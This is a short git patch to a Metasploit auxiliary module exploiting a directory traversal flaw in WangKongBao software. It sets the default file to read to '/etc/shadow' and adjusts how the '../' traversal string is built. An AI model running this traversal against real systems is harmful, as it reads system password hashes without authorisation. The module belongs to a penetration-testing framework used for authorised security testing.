From ecb4e20c9228d00df6849fd51099474f437a8f85 Mon Sep 17 00:00:00 2001
From: sinn3r <msfsinn3r@gmail.com>
Date: Fri, 6 Jul 2012 01:23:41 -0500
Subject: [PATCH] Instead of deleting the "/", here's a different approach

---
 modules/auxiliary/scanner/http/wangkongbao_traversal.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
index fa9dd2e7bf..60860f05c2 100644
--- a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
+++ b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
 		register_options(
 			[
 				Opt::RPORT(85),
-				OptString.new('FILEPATH', [false, 'The name of the file to download', 'etc/shadow']),
+				OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/shadow']),
 				OptInt.new('DEPTH', [true, 'Traversal depth', 10])
 			], self.class)
 	end
@@ -50,6 +50,7 @@ class Metasploit3 < Msf::Auxiliary
 		end
 
 		travs = "../" * datastore['DEPTH']
+		travs = travs[0,travs.rindex('/')]
 
 		# Create request
 		res = send_request_raw({